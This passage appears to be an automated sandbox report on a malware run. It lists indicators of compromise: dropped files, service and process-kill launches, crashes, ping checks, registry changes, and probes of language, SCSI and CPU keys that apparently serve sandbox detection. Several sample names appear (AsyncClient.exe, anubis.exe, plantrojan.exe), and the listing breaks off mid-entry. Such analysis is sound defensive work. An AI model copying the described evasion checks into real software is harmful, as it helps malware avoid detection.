Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\chrome.7z setup.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\Locales\te.pak setup.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\VisualElements\LogoBeta.png setup.exe File created C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler64.exe GoogleUpdate.exe File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_hr.dll GoogleUpdate.exe File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_lv.dll GoogleUpdate.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\Locales\fi.pak setup.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\Locales\it.pak setup.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\Locales\ml.pak setup.exe File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_ko.dll GoogleUpdate.exe File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_pt-PT.dll GoogleUpdate.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\default_apps\external_extensions.json setup.exe File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_es-419.dll GoogleUpdate.exe File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_is.dll GoogleUpdate.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\vk_swiftshader_icd.json setup.exe File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_am.dll GoogleUpdate.exe File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_bg.dll GoogleUpdate.exe File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_cs.dll GoogleUpdate.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\Locales\sw.pak setup.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\Locales\ur.pak setup.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\Locales\zh-TW.pak setup.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\PrivacySandboxAttestationsPreloaded\manifest.json setup.exe File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_da.dll GoogleUpdate.exe File created C:\Program Files (x86)\Google\Update\GoogleUpdate.exe GoogleUpdate.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\Locales\ar.pak setup.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\Locales\hi.pak setup.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\Locales\lv.pak setup.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\Locales\uk.pak setup.exe File created C:\Program Files\Google\Chrome\Application\chrome.exe setup.exe File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_te.dll GoogleUpdate.exe File created C:\Program Files (x86)\Google\Update\1.3.36.352\psmachine.dll GoogleUpdate.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\Locales\es.pak setup.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\131.0.6778.86.manifest setup.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\Locales\gu.pak setup.exe File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_en-GB.dll GoogleUpdate.exe File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_ja.dll GoogleUpdate.exe File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_sw.dll GoogleUpdate.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\VisualElements\SmallLogoBeta.png setup.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\chrome.exe.sig setup.exe File created C:\Program Files\Google\Chrome\Application\131.0.6778.86\Installer\setup.exe setup.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\Locales\cs.pak setup.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\Locales\fa.pak setup.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\Locales\ro.pak setup.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\icudtl.dat setup.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\Locales\ca.pak setup.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\libGLESv2.dll setup.exe File created C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler.exe GoogleUpdate.exe File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_bn.dll GoogleUpdate.exe File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_ms.dll GoogleUpdate.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\Locales\lt.pak setup.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\Locales\sv.pak setup.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\Locales\vi.pak setup.exe File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_no.dll GoogleUpdate.exe File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_pt-BR.dll GoogleUpdate.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\Extensions\external_extensions.json setup.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\Locales\el.pak setup.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\Locales\ta.pak setup.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\WidevineCdm\_platform_specific\win_x64\widevinecdm.dll setup.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\notification_helper.exe setup.exe File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_ur.dll GoogleUpdate.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\chrome_100_percent.pak setup.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\chrome_200_percent.pak setup.exe File created C:\Program Files\Google\Chrome\Temp\source2980_438819423\Chrome-bin\131.0.6778.86\eventlog_provider.dll setup.exe File created C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe GoogleUpdate.exe -
Drops file in Windows directory 64 IoCs
description ioc Process File created C:\Windows\SystemTemp\GUMDAAC.tmp\GoogleUpdateCore.exe ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_cs.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_am.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_hr.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_id.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_sv.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_ta.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_tr.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_fil.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_sl.dll ChromeSetup.exe File opened for modification C:\Windows\SystemTemp setup.exe File opened for modification C:\Windows\SystemTemp\Crashpad\metadata setup.exe File opened for modification C:\Windows\SystemTemp\Crashpad\settings.dat setup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\GoogleUpdateOnDemand.exe ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_et.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_gu.dll ChromeSetup.exe File opened for modification C:\Windows\SystemTemp\GUMDAAC.tmp\GoogleUpdateSetup.exe ChromeSetup.exe File opened for modification C:\Windows\SystemTemp\Crashpad\metadata setup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\GoogleCrashHandler64.exe ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_bn.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_fr.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_ms.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_nl.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_ru.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_da.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_ml.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_pt-BR.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_ro.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_sr.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_vi.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_zh-CN.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_es-419.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_sw.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\GoogleUpdateBroker.exe ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\psuser_64.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_es.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_fa.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_is.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_no.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_zh-TW.dll ChromeSetup.exe File opened for modification C:\Windows\SystemTemp\GUTDAAD.tmp ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_ca.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_kn.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_sk.dll ChromeSetup.exe File opened for modification C:\Windows\SystemTemp setup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\GoogleCrashHandler.exe ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_bg.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_en.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_th.dll ChromeSetup.exe File opened for modification C:\Windows\VariousProduces sgx4824p.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\psmachine.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\psmachine_64.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_it.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_ja.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_ko.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_lt.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_te.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_ur.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\GoogleUpdateComRegisterShell64.exe ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_de.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_en-GB.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_hu.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_iw.dll ChromeSetup.exe File created C:\Windows\SystemTemp\GUMDAAC.tmp\goopdateres_mr.dll ChromeSetup.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4752 sc.exe 4836 sc.exe 3496 sc.exe 2164 sc.exe 2364 sc.exe 3472 sc.exe 4712 sc.exe 1584 sc.exe 1028 sc.exe 1948 sc.exe -
Detects Pyinstaller 9 IoCs
resource yara_rule behavioral1/files/0x001900000002aaee-46.dat pyinstaller behavioral1/files/0x001900000002ada1-5332.dat pyinstaller behavioral1/files/0x001a00000002adb6-7258.dat pyinstaller behavioral1/files/0x001900000002af68-7265.dat pyinstaller behavioral1/files/0x000300000002a536-7787.dat pyinstaller behavioral1/files/0x000600000002a52a-8777.dat pyinstaller behavioral1/files/0x000200000002a533-8892.dat pyinstaller behavioral1/files/0x001500000002b294-8997.dat pyinstaller behavioral1/files/0x000200000002a5e6-10055.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 16 IoCs
pid pid_target Process procid_target 2400 4592 WerFault.exe 80 6300 6760 WerFault.exe 344 6276 6264 WerFault.exe 369 4620 6132 WerFault.exe 396 788 6748 WerFault.exe 371 4696 3468 WerFault.exe 417 2908 4580 WerFault.exe 420 5824 5016 WerFault.exe 442 2676 7868 WerFault.exe 490 9956 8592 WerFault.exe 527 9440 7124 WerFault.exe 573 8804 6296 WerFault.exe 609 10228 7056 WerFault.exe 607 7376 7172 WerFault.exe 678 7976 7204 WerFault.exe 710 3932 6184 WerFault.exe 742 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Legend.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kiyan.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ChromeSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ConsoleApp3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GoogleUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language systemware.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language systemware.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Cooper.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GoogleUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language compiled.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language npp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Cooper.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GoogleUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language systemware.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language plantrojan.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language intro.avi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDX123456.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language logon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GoogleUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Loader.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallerPack_20.1.23770_win64.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language But.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language golden.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CrazyCoach.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AsyncClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language anubis.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 15 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2152 PING.EXE 9448 PING.EXE 772 PING.EXE 7956 PING.EXE 9668 cmd.exe 9560 PING.EXE 872 PING.EXE 9800 PING.EXE 5780 cmd.exe 7336 PING.EXE 6220 GoogleUpdate.exe 6408 PING.EXE 7064 PING.EXE 8144 PING.EXE 8308 GoogleUpdate.exe -
NSIS installer 1 IoCs
resource yara_rule behavioral1/files/0x000d00000002b72a-10966.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI up.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI up.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI up.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 But.pif Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString But.pif -
Delays execution with timeout.exe 1 IoCs
pid Process 4044 timeout.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 7684 wmic.exe -
Kills process with taskkill 8 IoCs
pid Process 3148 taskkill.exe 9592 taskkill.exe 10040 taskkill.exe 9512 taskkill.exe 7492 taskkill.exe 9596 taskkill.exe 5484 taskkill.exe 9840 taskkill.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ChromeHTML\ = "Chrome HTML Document" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ChromePDF\Application\ApplicationCompany = "Google LLC" setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{128C2DA6-2BC0-44C0-B3F6-4EC22E647964} GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\ProxyStubClsid32 GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{FE908CDD-22BB-472A-9870-1A0390E42F36}\ProxyStubClsid32 GoogleUpdate.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{521FDB42-7130-4806-822A-FC5163FAD983} GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\NumMethods\ = "13" GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{909489C2-85A6-4322-AA56-D25278649D67} GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{909489C2-85A6-4322-AA56-D25278649D67}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1C4CDEFF-756A-4804-9E77-3E8EB9361016}\ProgID\ = "GoogleUpdate.PolicyStatusSvc.1.0" GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{76F7B787-A67C-4C73-82C7-31F5E3AABC5C}\ = "IApp" GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32\ThreadingModel = "Both" GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2D363682-561D-4C3A-81C6-F2F82107562A}\NumMethods\ = "4" GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{FE908CDD-22BB-472A-9870-1A0390E42F36}\NumMethods GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4DE778FE-F195-4EE3-9DAB-FE446C239221}\NumMethods\ = "11" GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BCDCB538-01C0-46D1-A6A7-52F4D021C272}\ = "IAppVersion" GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BCDCB538-01C0-46D1-A6A7-52F4D021C272}\NumMethods GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{6F8BD55B-E83D-4A47-85BE-81FFA8057A69}\ProgID\ = "GoogleUpdate.OnDemandCOMClassMachine.1.0" GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3D05F64F-71E3-48A5-BF6B-83315BC8AE1F}\NumMethods GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{128C2DA6-2BC0-44C0-B3F6-4EC22E647964}\NumMethods GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5}\NumMethods GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{27634814-8E41-4C35-8577-980134A96544}\NumMethods\ = "12" GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32 GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8A1D4361-2C08-4700-A351-3EAA9CBFF5E4}\ = "Google Update Broker Class Factory" GoogleUpdate.exe Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\26\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" Cooper.pif Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{19692F10-ADD2-4EFF-BE54-E61C62E40D13}\ = "IJobObserver2" GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DAB1D343-1B2A-47F9-B445-93DC50704BFE}\NumMethods GoogleUpdateComRegisterShell64.exe Set value (str) 